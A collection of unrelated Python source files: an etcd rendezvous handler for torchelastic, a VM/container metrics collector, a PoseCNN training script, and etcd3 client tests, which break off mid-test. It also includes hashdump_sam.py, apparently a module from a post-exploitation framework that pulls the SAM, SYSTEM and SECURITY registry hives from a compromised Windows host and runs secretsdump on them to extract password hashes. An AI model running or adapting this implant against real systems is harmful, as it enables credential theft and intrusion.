min_nodes - min number of workers expected to join the rendezvous,
max_nodes - max number of workers allowed to join the rendezvous,
defaults to min_workers is not specified.
timeout - total timeout within which next_rendezvous is expected to
succeed; a RendezvousTimeoutException is raised otherwise;
Defaults is 600 (10 minutes).
last_call_timeout - additional wait amount ("last call") after
min number of workers has been reached.
Defaults to 30 seconds.
etcd_prefix - path prefix (from etcd root), inside which all
etcd nodes will be created.
Default is "/torchelastic/p2p".
protocol - http (default) or https to access etcd.
cacert - CA cert to access etcd, only makes sense with https.
cert - client cert to access etcd, only makes sense with https.
key - client key to access etcd, only makes sense with https.
"""
import re
# Etcd endpoints. (Current url format only allows a single host)
endpoint = rdzv_params.endpoint
match = re.match(r"(.+):(\d+)$", endpoint) # check if port was provided
if match:
etcd_endpoints = ((match.group(1), int(match.group(2))),)
else:
# Use default etcd port
etcd_endpoints = ((endpoint, 2379),)
# Run ID value -> unique identifier of this training job instance:
# typically a job_id or name assigned by the scheduler or user
run_id = rdzv_params.run_id
# Parse all of query parameters:
etcd_prefix = rdzv_params.get("etcd_prefix", "/torchelastic/p2p")
min_workers = rdzv_params.min_nodes
max_workers = rdzv_params.max_nodes
assert min_workers >= 1, "Min number of workers should be at least 1"
assert (
max_workers >= min_workers
), "Max number of workers cannot be less than min number of workers"
timeout = rdzv_params.get("timeout", CONST_DEFAULT_OVERALL_TIMEOUT)
last_call_timeout = rdzv_params.get(
"last_call_timeout", CONST_DEFAULT_LAST_CALL_TIMEOUT
)
kwargs = _parse_etcd_client_params(rdzv_params.configs)
# Etcd rendezvous implementation
etcd_rdzv = EtcdRendezvous(
endpoints=etcd_endpoints,
prefix=etcd_prefix,
run_id=run_id,
num_min_workers=min_workers,
num_max_workers=max_workers,
timeout=timeout,
last_call_timeout=last_call_timeout,
**kwargs,
)
return EtcdRendezvousHandler(rdzv_impl=etcd_rdzv)
|
hashdump_sam.py
|
import core.implant
class HashDumpSAMImplant(core.implant.Implant):
NAME = "SAM Hash Dump"
DESCRIPTION = "Dumps the SAM hive off the target system."
AUTHORS = ["zerosum0x0"]
def load(self):
self.options.register("LPATH", "/tmp/", "local file save path")
self.options.register("RPATH", "%TEMP%", "remote file save path")
self.options.register("GETSYSHIVE", "false", "Retrieve the system hive? (slower, but more reliable)",enum=["true", "false"])
def job(self):
return HashDumpSAMJob
def run(self):
import os.path
if not os.path.isfile("data/impacket/examples/secretsdump.py"):
old_prompt = self.shell.prompt
old_clean_prompt = self.shell.clean_prompt
self.shell.prompt = "Would you like me to get it for you? y/N: "
self.shell.clean_prompt = self.shell.prompt
self.shell.print_warning("It doesn't look like you have the impacket submodule installed yet! This module will fail if you don't have it!")
try:
import readline
readline.set_completer(None)
option = self.shell.get_command(self.shell.prompt)
if option.lower() == "y":
from subprocess import call
call(["git", "submodule", "init"])
call(["git", "submodule", "update"])
except KeyboardInterrupt:
self.shell.print_plain(self.shell.clean_prompt)
return
finally:
self.shell.prompt = old_prompt
self.shell.clean_prompt = old_clean_prompt
self.options.set("RPATH", self.options.get('RPATH').replace("\\", "\\\\").replace('"', '\\"'))
payloads = {}
payloads["js"] = self.loader.load_script("data/implant/gather/hashdump_sam.js", self.options)
self.dispatch(payloads, self.job)
class HashDumpSAMJob(core.job.Job):
def create(self):
if self.session_id == -1:
return
if self.session.elevated != 1 and self.options.get("IGNOREADMIN") == "false":
self.error("0", "This job requires an elevated session. Set IGNOREADMIN to true to run anyway.", "Not elevated", "")
return False
def save_file(self, data, name, encoder):
import uuid
save_fname = self.options.get("LPATH") + "/" + name + "." + self.ip + "." + uuid.uuid4().hex
save_fname = save_fname.replace("//", "/")
with open(save_fname, "wb") as f:
data = self.decode_downloaded_data(data, encoder)
f.write(data)
return save_fname
def report(self, handler, data, sanitize = False):
task = handler.get_header("Task", False)
if task == "SAM":
handler.reply(200)
self.print_status("received SAM hive (%d bytes)" % len(data))
self.sam_data = data
self.sam_encoder = handler.get_header("encoder", 1252)
return
if task == "SYSTEM":
handler.reply(200)
self.print_status("received SYSTEM hive (%d bytes)" % len(data))
self.system_data = data
self.system_encoder = handler.get_header("encoder", 1252)
return
if task == "SysKey":
handler.reply(200)
self.print_status("received SysKey (%d bytes)" % len(data))
self.syskey_data = data
self.system_data = ""
self.syskey_encoder = handler.get_header("encoder", 1252)
return
if task == "SECURITY":
handler.reply(200)
self.print_status("received SECURITY hive (%d bytes)" % len(data))
self.security_data = data
self.security_encoder = handler.get_header("encoder", 1252)
return
# dump sam here
import threading
self.finished = False
threading.Thread(target=self.finish_up).start()
handler.reply(200)
def finish_up(self):
from subprocess import Popen, PIPE, STDOUT
path = "data/impacket/examples/secretsdump.py"
self.sam_file = self.save_file(self.sam_data, "SAM", self.sam_encoder)
self.print_status("decoded SAM hive (%s)" % self.sam_file)
self.security_file = self.save_file(self.security_data, "SECURITY", self.security_encoder)
self.print_status("decoded SECURITY hive (%s)" % self.security_file)
if self.system_data:
self.system_file = self.save_file(self.system_data, "SYSTEM", self.system_encoder)
self.print_status("decoded SYSTEM hive (%s)" % self.system_file)
cmd = ['python2', path, '-sam', self.sam_file, '-system', self.system_file, '-security', self.security_file, 'LOCAL']
else:
self.syskey_data_file = self.save_file(self.syskey_data, "SYSKEY", self.syskey_encoder)
tmp_syskey = ""
self.syskey = ""
with open(self.syskey_data_file, 'rb') as syskeyfile:
file_contents = syskeyfile.read()
i = 4220
while i < 28811:
j = i + 15
while i < j:
tmp_syskey += file_contents[i:i+1].decode()
i += 2
i += 8176
tmp_syskey = list(map(''.join, zip(*[iter(tmp_syskey)]*2)))
transforms = [8, 5, 4, 2, 11, 9, 13, 3, 0, 6, 1, 12, 14, 10, 15, 7]
for i in transforms:
self.syskey += tmp_syskey[i]
try:
self.syskey.decode()
except:
self.error("0", "There was a problem decoding the syskey. Try setting GETSYSHIVE to true and running again.", "Decode error", "")
return False
self.print_status("decoded SysKey: 0x%s" % self.syskey)
cmd = ['python2', path, '-sam', self.sam_file, '-bootkey', self.syskey, '-security', self.security_file, 'LOCAL']
p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=STDOUT, close_fds=True, env={"PYTHONPATH": "./data/impacket"})
output = p.stdout.read().decode()
self.shell.print_plain(output)
self.results = output
cp = core.cred_parser.CredParse(self)
cp.parse_hashdump_sam(output)
super(HashDumpSAMJob, self).report(None, "", False)
def done(self):
pass
def display(self):
pass
|
main.py
|
## ALL RIGHTS RESERVED.
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
## Neither the name of the SONATA-NFV, 5GTANGO [, ANY ADDITIONAL AFFILIATION]
## nor the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## This work has been performed in the framework of the SONATA project,
## funded by the European Commission under Grant number 671517 through
## the Horizon 2020 and 5G-PPP programmes. The authors would like to
## acknowledge the contributions of their colleagues of the SONATA
## partner consortium (www.sonata-nfv.eu).
##
## This work has been performed in the framework of the 5GTANGO project,
## funded by the European Commission under Grant number 761493 through
## the Horizon 2020 and 5G-PPP programmes. The authors would like to
## acknowledge the contributions of their colleagues of the 5GTANGO
## partner consortium (www.5gtango.eu).
# encoding: utf-8
import urllib2, time, logging
import json, urllib2, os, subprocess
from threading import Thread
from VmData import vmdt
from DtFiltering import valdt
from ContData import cntdt
from configure import configuration
from logging.handlers import RotatingFileHandler
def init():
global prometh_server
global node_name
global logger
global vm_id
#read configuration
conf = configuration("/opt/Monitoring/node.conf")
if hasattr(conf.ConfigSectionMap("vm_node"),'cadvisor'):
cadvisor = conf.ConfigSectionMap("vm_node")['cadvisor']
node_name = os.getenv('NODE_NAME', conf.ConfigSectionMap("vm_node")['node_name'])
prometh_server = os.getenv('PROM_SRV', conf.ConfigSectionMap("Prometheus")['server_url'])
#node_name = conf.ConfigSectionMap("vm_node")['node_name']
#prometh_server = conf.ConfigSectionMap("Prometheus")['server_url']
if hasattr(conf.ConfigSectionMap("vm_node"),'node_exporter'):
node_exporter = conf.ConfigSectionMap("vm_node")['node_exporter']
logger = logging.getLogger('dataCollector')
#hdlr = logging.FileHandler('dataCollector.log', mode='w')
hdlr = RotatingFileHandler('dataCollector.log', maxBytes=10000, backupCount=1)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
logger.setLevel(logging.WARNING)
logger.setLevel(logging.INFO)
#vm_id = getMetaData()
vm_id = getUUID()
if vm_id == None:
vm_id = node_name
node_name +=":"+vm_id
print vm_id
logger.info('SP Data Collector')
logger.info('Promth Server '+prometh_server)
logger.info('Monitoring Node '+node_name)
def postNode(node_,type_, data_):
url = prometh_server+"/job/"+type_+"/instance/"+node_
logger.info('Post on: \n'+url)
try:
req = urllib2.Request(url)
req.add_header('Content-Type','text/html')
req.get_method = lambda: 'PUT'
response=urllib2.urlopen(req,data_)
code = response.code
logger.info('Response Code: '+str(code))
except urllib2.HTTPError, e:
logger.warning('Error: '+str(e))
except urllib2.URLError, e:
logger.warning('Error: '+str(e))
def getUUID():
path = '/usr/sbin/dmidecode | grep UUID'
print(os.path.isdir("/rootfs"))
if (os.path.isdir("/rootfs")):
path = '/rootfs'+path
p = subprocess.Popen(path, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
lines = p.stdout.readlines()
try:
for line in lines:
ar = line.split(" ")
return ar[1].strip().lower()
except:
logger.warning('Error on retrieving UUID')
return None
pass
def getMetaData():
try:
url = 'http://169.254.169.254/openstack/latest/meta_data.json'
req = urllib2.Request(url)
req.add_header('Content-Type','application/json')
response=urllib2.urlopen(req, timeout = 180)
code = response.code
data = json.loads(response.read())
#print json.dumps(data)
return data["uuid"]
except urllib2.HTTPError, e:
logger.warning('Error: '+str(e))
except urllib2.URLError, e:
logger.warning('Error: '+str(e))
except ValueError, e:
logger.warning('Error: '+str(e))
def function1(id_):
global vm_dt
vm_dt = None
lsval={}
while 1:
dt_collector = vmdt(id_,lsval)
lsval = dt_collector.getCurrentDT()
vm_dt = dt_collector.prom_parser()
time.sleep(1)
def function2():
global container_dt
container_dt = None
while 1:
container_dt = cntdt().prom_parser()
time.sleep(4)
if __name__ == "__main__":
init()
t1 = Thread(target = function1, args=(vm_id,))
t2 = Thread(target = function2)
t1.daemon = True
t2.daemon = True
t1.start()
t2.start()
while 1:
time.sleep(5)
if container_dt:
postNode(node_name,"containers",container_dt)
if vm_dt:
postNode(node_name,"vm",vm_dt)
|
train_net_pth.py
|
import time, os, sys
import os.path as osp
import numpy as np
from Queue import Queue
from threading import Thread
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
sys.path.append("lib/model")
from average_distance_loss.modules.average_distance_loss import AverageDistanceLoss
from hard_label.modules.hard_label import HardLabel
import _init_paths
from fcn.config import cfg, cfg_from_file, get_output_dir
from datasets.factory import get_imdb
from gt_posecnn_layer.layer import GtPoseCNNLayer
# from fcn.train import SolverWrapper
import cv2
# OpenCL may be enabled by default in OpenCV3; disable it because it's not
# thread safe and causes unwanted GPU memory allocations.
cv2.ocl.setUseOpenCL(False)
def load_cfg(args):
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
cfg.GPU_ID = args.gpu_id
device_name = '/gpu:{:d}'.format(args.gpu_id)
print(device_name)
cfg.RIG = args.rig_name
cfg.CAD = args.cad_name
cfg.POSE = args.pose_name
cfg.IS_TRAIN = True
cfg.TRAIN.LEARNING_RATE = 0.0005
cfg.TRAIN.SNAPSHOT_ITERS = 500
cfg.TRAIN.USE_FLIPPED = False
cfg.TRAIN.IMS_PER_BATCH = 1
# cfg.TRAIN.SNAPSHOT_PREFIX = "vgg16"
cfg.TRAIN.SNAPSHOT_PREFIX = "resnet50"
def get_lov2d_args():
class Args():
pass
args = Args()
args.gpu_id = 0
args.max_iters = 200
# args.pretrained_model = "/data/models/vgg16.pth"
args.pretrained_model = "/data/models/resnet50.pth"
args.pretrained_ckpt = None#"posecnn.pth"
# args.pretrained_ckpt = "output/lov/lov_debug/resnet50_lov_iter_100.pth"
args.cfg_file = "experiments/cfgs/lov_color_2d.yml"
args.imdb_name = "lov_debug"
args.randomize = False
args.rig_name = None # "data/LOV/camera.json"
args.cad_name = "data/LOV/models.txt"
args.pose_name = "data/LOV/poses.txt"
return args
def get_network():
from convert_to_pth import PoseCNN
return PoseCNN(cfg.TRAIN.NUM_UNITS, cfg.TRAIN.NUM_CLASSES, \
500, cfg.TRAIN.VOTING_THRESHOLD, cfg.IS_TRAIN, 0.5)
def get_training_roidb(imdb):
"""Returns a roidb (Region of Interest database) for use in training."""
# if cfg.TRAIN.USE_FLIPPED:
# print 'Appending horizontally-flipped training examples...'
# imdb.append_flipped_images()
# print 'done'
return imdb.roidb
def save_net(network, output_dir, iter):
infix = ('_' + cfg.TRAIN.SNAPSHOT_INFIX if cfg.TRAIN.SNAPSHOT_INFIX != '' else '')
filename = (cfg.TRAIN.SNAPSHOT_PREFIX + infix + '_iter_{:d}'.format(iter+1) + '.pth')
filename = os.path.join(output_dir, filename)
torch.save(network.state_dict(), filename)
print("Saved to %s"%(filename))
def loss_cross_entropy_single_frame(scores, labels):
"""
scores: a tensor [batch_size, num_classes, height, width]
labels: a tensor [batch_size, num_classes, height, width]
"""
cross_entropy = -torch.sum(labels * scores, 1)
loss = torch.div( torch.sum(cross_entropy), torch.sum(labels) + 1e-10)
return loss
def smooth_l1_loss_vertex(vertex_pred, vertex_targets, vertex_weights, sigma=1.0):
sigma_2 = sigma ** 2
vertex_diff = vertex_pred - vertex_targets
diff = torch.mul(vertex_weights, vertex_diff)
abs_diff = torch.abs(diff)
smoothL1_sign = (abs_diff < 1. / sigma_2).clone().float()
smoothL1_sign.detach_()
# smoothL1_sign = smoothL1_sign.float()
# smoothL1_sign = tf.stop_gradient(tf.to_float(tf.less(abs_diff, 1. / sigma_2)))
in_loss = torch.pow(diff, 2) * (sigma_2 / 2.) * smoothL1_sign \
+ (abs_diff - (0.5 / sigma_2)) * (1. - smoothL1_sign)
loss = torch.div( torch.sum(in_loss), torch.sum(vertex_weights) + 1e-10 )
return loss
def hard_label_func(prob_normalized, gt_label_2d, threshold=1.0):
return HardLabel(threshold)(gt_label_2d, prob_normalized)
def average_distance_loss_func(poses_pred, poses_target, poses_weight, points, symmetry, num_classes, margin=0.01):
return AverageDistanceLoss(num_classes, margin)(poses_pred, poses_target, poses_weight, points, symmetry)
def transpose_BHWC_to_BCHW(x):
return np.transpose(x, [0,3,1,2])
def CT(x, dtype=torch.float32, requires_grad=False):
return torch.tensor(x, dtype=dtype, requires_grad=requires_grad, device="cuda")
def FCT(x, requires_grad=False):
return CT(x, requires_grad=requires_grad)
def ICT(x, requires_grad=False):
return CT(x, dtype=torch.int32, requires_grad=requires_grad)
def fetch_data(q, data_layer, sleep_time=None):
while True:
blobs = data_layer.forward()
blobs['data_image_color'] = FCT(transpose_BHWC_to_BCHW(blobs['data_image_color']))
blobs['data_vertex_weights'] = FCT(transpose_BHWC_to_BCHW(blobs['data_vertex_weights']))
blobs['data_vertex_targets'] = FCT(transpose_BHWC_to_BCHW(blobs['data_vertex_targets']))
blobs['data_points'] = FCT(blobs['data_points'])
blobs['data_label'] = ICT(blobs['data_label'])
blobs['data_extents'] = FCT(blobs['data_extents'])
blobs['data_pose'] = FCT(blobs['data_pose'])
blobs['data_meta_data'] = FCT(blobs['data_meta_data'])
blobs['data_symmetry'] = FCT(blobs['data_symmetry'])
q.put(blobs)
if sleep_time is not None and sleep_time != 0:
time.sleep(sleep_time)
def get_losses(network, blobs, num_classes, include_pose_loss=False):
blob_im = blobs['data_image_color']
vertex_weights = blobs['data_vertex_weights']
vertex_targets = blobs['data_vertex_targets']
blob_points = blobs['data_points']
blob_labels = blobs['data_label']
blob_extents = blobs['data_extents']
blob_poses = blobs['data_pose']
blob_meta_data = blobs['data_meta_data']
blob_sym = blobs['data_symmetry']
# pose loss
if include_pose_loss:
scores, label_2d, vertex_pred, hough_outputs, poses_tanh = network.forward(blob_im, blob_extents, blob_poses, blob_meta_data)
poses_target, poses_weight = hough_outputs[2:4]
poses_mul = torch.mul(poses_tanh, poses_weight)
poses_pred = F.normalize(poses_mul, p=2, dim=1)
loss_pose = cfg.TRAIN.POSE_W * average_distance_loss_func(poses_pred, poses_target, poses_weight, blob_points, blob_sym, num_classes, margin=0.01)
else:
scores, label_2d, vertex_pred = network.forward_image(blob_im)
loss_pose = FCT(0)
# cls loss
prob = F.log_softmax(scores, 1).permute((0,2,3,1)).clone() # permute for hard_label_func, which is in BHWC format
prob_n = F.softmax(scores, 1).permute((0,2,3,1)).clone() # permute for hard_label_func, which is in BHWC format
hard_labels = hard_label_func(prob_n, blob_labels, threshold=1.0)
loss_cls = loss_cross_entropy_single_frame(prob, hard_labels)
# vertex loss
loss_vertex = cfg.TRAIN.VERTEX_W * smooth_l1_loss_vertex(vertex_pred, vertex_targets, vertex_weights)
loss = loss_cls + loss_vertex + loss_pose
# loss_regu = 0 # TODO: tf.add_n(tf.losses.get_regularization_losses(), 'regu')
return loss, loss_cls, loss_vertex, loss_pose
def train_net(network, imdb, roidb, output_dir, pretrained_model=None, pretrained_ckpt=None, max_iters=40000):
num_classes = imdb.num_classes
# LOAD DATA LAYER
data_layer = GtPoseCNNLayer(roidb, num_classes, imdb._extents, imdb._points_all, imdb._symmetry)
q = Queue(maxsize=10)
sleep_time_seconds = None
num_data_workers = 3
for i in xrange(num_data_workers):
worker = Thread(target=fetch_data, args=(q,data_layer,sleep_time_seconds,))
worker.setDaemon(True)
worker.start()
# LOAD PRETRAINED MODEL OR CKPT
if pretrained_ckpt is not None:
print ('Loading pretrained ckpt weights from %s'%(pretrained_ckpt))
ckpt = torch.load(pretrained_ckpt)
network.load_state_dict(ckpt)
elif pretrained_model is not None:
print ('Loading pretrained model weights from %s'%(pretrained_model))
network.load_pretrained(pretrained_model)
torch.cuda.empty_cache()
network.cuda()
network.train()
# optimizer
start_lr = cfg.TRAIN.LEARNING_RATE
momentum = cfg.TRAIN.MOMENTUM
optimizer = optim.Adam(network.parameters(), lr=start_lr, weight_decay=cfg.TRAIN.WEIGHT_REG)
# optimizer = optim.SGD(filter(lambda p: p.requires_grad,network.parameters()), lr=start_lr, momentum=momentum, weight_decay=cfg.TRAIN.WEIGHT_REG)
# optimizer = optim.SGD(filter(lambda p: p.requires_grad,network.parameters()), lr=start_lr, momentum=momentum)
lr = start_lr
# global_step = tf.Variable(0, trainable=False)
# learning_rate = tf.train.exponential_decay(starter_learning_rate, global_step,
# cfg.TRAIN.STEPSIZE, 0.1, staircase=True)
get_tensor_np = lambda x: x.data.cpu().numpy()
print('Training...')
last_snapshot_iter = 0
iter = 0
loss_cls = loss_vertex = 1e5
while iter < max_iters:
if q.empty():
sleep_s = 0.5
print("Data queue empty, sleeping for %.2f seconds.."%(sleep_s))
time.sleep(sleep_s)
continue
blobs = q.get()
q.task_done()
include_pose_loss = loss_cls < 0.4 and loss_vertex < 0.2
loss, loss_cls, loss_vertex, loss_pose = get_losses(network, blobs, num_classes, include_pose_loss=include_pose_loss)
optimizer.zero_grad()
loss.backward()
optimizer.step()
# loss_value, loss_cls_value, loss_vertex_value, loss_pose_value = get_tensor_np(loss),
# get_tensor_np(loss_cls), get_tensor_np(loss_vertex), get_tensor_np(loss_pose)
print('iter: %d / %d, loss: %.4f, loss_cls: %.4f, loss_vertex: %.4f, loss_pose: %.4f, lr: %.6f' %\
(iter+1, max_iters, loss, loss_cls, loss_vertex, loss_pose, lr))
if (iter+1) % cfg.TRAIN.SNAPSHOT_ITERS == 0:
last_snapshot_iter = iter
save_net(network, output_dir, iter)
iter += 1
iter -= 1
if last_snapshot_iter != iter:
save_net(network, output_dir, iter)
print('Training complete')
if __name__ == '__main__':
# from fcn.train import train_net#, get_training_roidb
args = get_lov2d_args()
load_cfg(args)
if not args.randomize:
# fix the random seeds (numpy and caffe) for reproducibility
np.random.seed(cfg.RNG_SEED)
imdb = get_imdb(args.imdb_name)
output_dir = get_output_dir(imdb, None)
print('Output will be saved to `{:s}`'.format(output_dir))
roidb = get_training_roidb(imdb)
network = get_network()
train_net(network, imdb, roidb, output_dir,
pretrained_model=args.pretrained_model,
pretrained_ckpt=args.pretrained_ckpt,
max_iters=args.max_iters)
|
test_etcd3.py
|
"""
Tests for `etcd3` module.
----------------------------------
"""
import base64
import contextlib
import json
import os
import signal
import string
import subprocess
import tempfile
import threading
import time
import grpc
from hypothesis import given, settings
from hypothesis.strategies import characters
import mock
import pytest
import six
from six.moves.urllib.parse import urlparse
from tenacity import retry, stop_after_attempt, wait_fixed
import etcd3
import etcd3.etcdrpc as etcdrpc
import etcd3.exceptions
import etcd3.utils as utils
from etcd3.client import EtcdTokenCallCredentials
etcd_version = os.environ.get('TEST_ETCD_VERSION', 'v3.2.8')
os.environ['ETCDCTL_API'] = '3'
if six.PY2:
int_types = (int, long)
else:
int_types = (int,)
# Don't set any deadline in Hypothesis
settings.register_profile("default", deadline=None)
settings.load_profile("default")
def etcdctl(*args):
endpoint = os.environ.get('PYTHON_ETCD_HTTP_URL')
if endpoint:
args = ['--endpoints', endpoint] + list(args)
args = ['etcdctl', '-w', 'json'] + list(args)
print(" ".join(args))
output = subprocess.check_output(args)
return json.loads(output.decode('utf-8'))
# def etcdctl2(*args):
# # endpoint = os.environ.get('PYTHON_ETCD_HTTP_URL')
# # if endpoint:
# # args = ['--endpoints', endpoint] + list(args)
# # args = ['echo', 'pwd', '|', 'etcdctl', '-w', 'json'] + list(args)
# # print(" ".join(args))
# output = subprocess.check_output("echo pwd | ./etcdctl user add root")
# return json.loads(output.decode('utf-8'))
@contextlib.contextmanager
def _out_quorum():
pids = subprocess.check_output(['pgrep', '-f', '--', '--name pifpaf[12]'])
pids = [int(pid.strip()) for pid in pids.splitlines()]
try:
for pid in pids:
os.kill(pid, signal.SIGSTOP)
yield
finally:
for pid in pids:
os.kill(pid, signal.SIGCONT)
class TestEtcd3(object):
class MockedException(grpc.RpcError):
def __init__(self, code):
self._code = code
def code(self):
return self._code
@pytest.fixture
def etcd(self):
endpoint = os.environ.get('PYTHON_ETCD_HTTP_URL')
timeout = 5
if endpoint:
url = urlparse(endpoint)
with etcd3.client(host=url.hostname,
port=url.port,
timeout=timeout) as client:
yield client
else:
with etcd3.client() as client:
yield client
@retry(wait=wait_fixed(2), stop=stop_after_attempt(3))
def delete_keys_definitely():
# clean up after fixture goes out of scope
etcdctl('del', '--prefix', '/')
out = etcdctl('get', '--prefix', '/')
assert 'kvs' not in out
delete_keys_definitely()
def test_get_unknown_key(self, etcd):
value, meta = etcd.get('probably-invalid-key')
assert value is None
assert meta is None
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_get_key(self, etcd, string):
etcdctl('put', '/doot/a_key', string)
returned, _ = etcd.get('/doot/a_key')
assert returned == string.encode('utf-8')
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_get_random_key(self, etcd, string):
etcdctl('put', '/doot/' + string, 'dootdoot')
returned, _ = etcd.get('/doot/' + string)
assert returned == b'dootdoot'
@given(
characters(blacklist_categories=['Cs', 'Cc']),
characters(blacklist_categories=['Cs', 'Cc']),
)
def test_get_key_serializable(self, etcd, key, string):
etcdctl('put', '/doot/' + key, string)
with _out_quorum():
returned, _ = etcd.get('/doot/' + key, serializable=True)
assert returned == string.encode('utf-8')
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_get_have_cluster_revision(self, etcd, string):
etcdctl('put', '/doot/' + string, 'dootdoot')
_, md = etcd.get('/doot/' + string)
assert md.response_header.revision > 0
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_put_key(self, etcd, string):
etcd.put('/doot/put_1', string)
out = etcdctl('get', '/doot/put_1')
assert base64.b64decode(out['kvs'][0]['value']) == \
string.encode('utf-8')
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_put_has_cluster_revision(self, etcd, string):
response = etcd.put('/doot/put_1', string)
assert response.header.revision > 0
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_put_has_prev_kv(self, etcd, string):
etcdctl('put', '/doot/put_1', 'old_value')
response = etcd.put('/doot/put_1', string, prev_kv=True)
assert response.prev_kv.value == b'old_value'
@given(characters(blacklist_categories=['Cs', 'Cc']))
def test_put_if_not_exists(self, etcd, string):
txn_status = etcd.put_if_not_exists('/doot/put_1', string)
assert txn_status is True
txn_status = etcd.put_if_not_exists('/doot/put_1', string)
assert txn_status is False
etcdctl('del', '/doot/put_1')
def test_delete_key(self, etcd):
etcdctl('put', '/doot/delete_this', 'delete pls')
v, _ = etcd.get('/doot/delete_this')
assert v == b'delete pls'
deleted = etcd.delete('/doot/delete_this')
assert deleted is True
deleted = etcd.delete('/doot/delete_this')
assert deleted is False
deleted = etcd.delete('/doot/not_here_dude')
assert deleted is False
v, _ = etcd.get('/doot/delete_this')
assert v is None
def test_delete_has_cluster_revision(self, etcd):
response = etcd.delete('/doot/delete_this', return_response=True)
assert response.header.revision > 0
def test_delete_has_prev_kv(self, etcd):
etcdctl('put', '/doot/delete_this', 'old_value')
response = etcd.delete('/doot/delete_this', prev_kv=True,
return_response=True)
assert response.prev_kvs[0].value == b'old_value'
def test_delete_keys_with_prefix(self, etcd):
etcdctl('put', '/foo/1', 'bar')
etcdctl('put', '/foo/2', 'baz')
v, _ = etcd.get('/foo/1')
assert v == b'bar'
v, _ = etcd.get('/foo/2')
assert v == b'baz'
response = etcd.delete_prefix('/foo')
assert response.deleted == 2
v, _ = etcd.get('/foo/1')
assert v is None
v, _ = etcd.get('/foo/2')
assert v is None
def test_new_watch_error(self, etcd):
# Trigger a failure while waiting on the new watch condition
with mock.patch.object(etcd.watcher._new_watch_cond, 'wait',
side_effect=ValueError):
with pytest.raises(ValueError):
etcd.watch('/foo')
# Ensure a new watch can be created
events, cancel = etcd.watch('/foo')
etcdctl('put', '/foo', '42')
next(events)
cancel()
def test_watch_key(self, etcd):
def update_etcd(v):
etcdctl('put', '/doot/watch', v)
out = etcdctl('get', '/doot/watch')
assert base64.b64decode(out['kvs'][0]['value']) == \
utils.to_bytes(v)
def update_key():
# sleep to make watch can get the event
time.sleep(3)
update_etcd('0')
time.sleep(1)
update_etcd('1')
time.sleep(1)
update_etcd('2')
time.sleep(1)
update_etcd('3')
time.sleep(1)
t = threading.Thread(name="update_key", target=update_key)
t.start()
change_count = 0
events_iterator, cancel = etcd.watch(b'/doot/watch')
for event in events_iterator:
assert event.key == b'/doot/watch'
assert event.value == \
utils.to_bytes(str(change_count))
# if cancel worked, we should not receive event 3
assert event.value != utils.to_bytes('3')
change_count += 1
if change_count > 2:
# if cancel not work, we will block in this for-loop forever
cancel()
t.join()
def test_watch_key_with_revision_compacted(self, etcd):
etcdctl('put', '/random', '1') # Some data to compact
def update_etcd(v):
etcdctl('put', '/watchcompation', v)
out = etcdctl('get', '/watchcompation')
assert base64.b64decode(out['kvs'][0]['value']) == \
utils.to_bytes(v)
def update_key():
# sleep to make watch can get the event
time.sleep(3)
update_etcd('0')
time.sleep(1)
update_etcd('1')
time.sleep(1)
update_etcd('2')
time.sleep(1)
update_etcd('3')
time.sleep(1)
t = threading.Thread(name="update_key", target=update_key)
t.start()
def watch_compacted_revision_test():
events_iterator, cancel = etcd.watch(
b'/watchcompation', start_revision=1)
error_raised = False
compacted_revision = 0
try:
next(events_iterator)
except Exception as err:
error_raised = True
assert isinstance(err, etcd3.exceptions.RevisionCompactedError)
compacted_revision = err.compacted_revision
assert error_raised is True
assert compacted_revision == 2
change_count = 0
events_iterator, cancel = etcd.watch(
b'/watchcompation', start_revision=compacted_revision)
for event in events_iterator:
assert event.key == b'/watchcompation'
assert event.value == \
utils.to_bytes(str(change_count))
# if cancel worked, we should not receive event 3
assert event.value != utils.to_bytes('3')
change_count += 1
if change_count > 2:
cancel()
# Compact etcd and test watcher
etcd.compact(2)
watch_compacted_revision_test()
t.join()
def test_watch_exception_during_watch(self, etcd):
def pass_exception_to_callback(callback):
time.sleep(1)
callback(self.MockedException(grpc.StatusCode.UNAVAILABLE))
def add_callback_mock(*args, **kwargs):
callback = args[1]
t = threading.Thread(name="pass_exception_to_callback",
target=pass_exception_to_callback,
args=[callback])
t.start()
return 1
watcher_mock = mock.MagicMock()
watcher_mock.add_callback = add_callback_mock
etcd.watcher = watcher_mock
events_iterator, cancel = etcd.watch('foo')
with pytest.raises(etcd3.exceptions.ConnectionFailedError):
for _ in events_iterator:
pass
def test_watch_timeout_on_establishment(self, etcd):
foo_etcd = etcd3.client(timeout=3)
def slow_watch_mock(*args, **kwargs):
time.sleep(4)
foo_etcd.watcher._watch_stub.Watch = slow_watch_mock # noqa
with pytest.raises(etcd3.exceptions.WatchTimedOut):
foo_etcd.watch('foo')
def test_watch_prefix(self, etcd):
def update_etcd(v):
etcdctl('put', '/doot/watch/prefix/' + v, v)
out = etcdctl('get', '/doot/watch/prefix/' + v)
assert base64.b64decode(out['kvs'][0]['value']) == \
utils.to_bytes(v)
def update_key():
# sleep to make watch can get the event
time.sleep(3)
update_etcd('0')
time.sleep(1)
update_etcd('1')
time.sleep(1)
update_etcd('2')
time.sleep(1)
update_etcd('3')
time.sleep(1)
t = threading.Thread(name="update_key_prefix", target=update_key)
t.start()
change_count = 0
events_iterator, cancel = etcd.watch_prefix('/doot/watch/prefix/')
for event in events_iterator:
assert event.key == \
utils.to_bytes('/doot/watch/prefix/{}'.format(change_count))
assert event.value == \
utils.to_bytes(str(change_count))
# if cancel worked, we should not receive event 3
